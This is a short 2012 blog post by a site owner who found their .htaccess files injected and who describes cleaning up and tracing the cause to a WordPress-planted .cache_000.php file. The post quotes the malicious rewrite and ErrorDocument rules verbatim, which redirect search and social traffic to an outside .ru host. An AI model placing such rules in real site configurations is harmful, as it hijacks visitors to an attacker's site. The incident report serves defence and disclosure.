Wednesday, July 4, 2012

Sites Hacked? .htaccess files were code injected

(Previous Title: "Inmotion Hosting Hacked?")
At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule>
and
ErrorDocument 400 http://2012medis.ru/cocumber?4
ErrorDocument 401 http://2012medis.ru/cocumber?4
ErrorDocument 403 http://2012medis.ru/cocumber?4
ErrorDocument 404 http://2012medis.ru/cocumber?4
ErrorDocument 500 http://2012medis.ru/cocumber?4
I corrected the problem by removing the injected code from my existing files and deleting the one's that were added which I identified quickly as being 1.57 KB (1,608 bytes)

-UPDATE-
It may be related to a file called ".cache_000.php" injected via a vulnerability with Wordpress. Look in your /wp-content/uploads/ directory for .cache_000.php
For me the file had the same timestamp as some of the .htaccess files did.

-UPDATE-
I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated Wordpress.

-UPDATE-  
Update Wordpress or make the .cache_000.php file not accessible